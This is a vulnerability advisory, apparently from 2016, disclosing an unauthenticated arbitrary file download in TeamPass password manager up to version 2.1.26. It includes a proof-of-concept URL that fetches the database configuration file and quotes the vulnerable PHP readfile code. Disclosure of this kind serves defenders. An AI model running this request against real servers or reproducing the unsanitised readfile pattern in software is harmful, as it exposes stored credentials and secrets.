1. ADVISORY INFORMATION
========================================
Title: TeamPass Passwords Management System via Unauth File Download and Arbitrary File Download
Application: TeamPass Passwords Management System
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: TeamPass Passwords Management System <=2.1.26
Bugs:Arbitrary File Download
Date of found:21.03.2016
Reported:09.05.2016
Date of Public Advisory:13.05.2016
Author: Hasan Emre Ozer
2. CREDIT
========================================
This vulnerability was identified during penetration test
by Hasan Emre Ozer & Halit Alptekin from PRODAFT / INVICTUS
Thank you Mehmet Ince for support
3. DESCRIPTION
========================================
We deciced to publish the vulnerability after its fix in release 2.1.264. VERSIONS AFFECTED
========================================
TeamPass Passwords Management System <=2.1.105. TECHNICAL DETAILS & POC
========================================
Using 'downloadFile.php'filefrom'sources' directory we can download anyfile.
Proof of Concept (POC)
Example for downloading database configuration:
http://teampass/sources/downloadFile.php?sub=includes&file=settings.php
Technical Details
<?php
......
header("Content-disposition: attachment; filename=".rawurldecode($_GET['name']));
header("Content-Type: application/octet-stream");
header("Pragma: public");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0, public");
header("Expires: 0");
readfile('../'.$_GET['sub'].'/'.basename($_GET['file']));
?>
$_GET['sub']and $_GET['file'] parameters vulnerable in readfile function.6. SOLUTION
========================================
Update to the latest version v2.1.267. REFERENCES
========================================
http://teampass.net/2016-05-13-release-2.1.26
